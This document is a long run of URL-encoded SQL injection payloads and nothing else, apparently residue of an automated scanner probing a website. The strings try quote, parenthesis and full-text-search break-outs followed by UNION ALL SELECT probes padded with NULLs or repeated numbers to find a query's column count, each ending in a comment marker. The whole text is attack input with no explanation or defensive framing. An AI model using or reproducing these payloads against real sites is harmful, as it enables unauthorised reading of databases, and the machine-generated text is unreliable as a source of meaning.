-4307%27%2B%28SELECT%20%27WrYi%27%20WHERE%205459%3D5459%20UNION%20ALL%20SELECT%205459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459--%20 -5681%27%2B%28SELECT%20%27RfBO%27%20WHERE%203721%3D3721%20UNION%20ALL%20SELECT%203721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721--%20 -6019%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731--%20 -1933%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412--%20 -8463%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976%2C9976--%20 -4540%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660--%20 -6095%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584--%20 -1940%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759%2C9759--%20 -5803%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230%2C1230--%20 -6034%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085%2C8085--%20 -4878%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256--%20 -8226%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651%2C1651--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 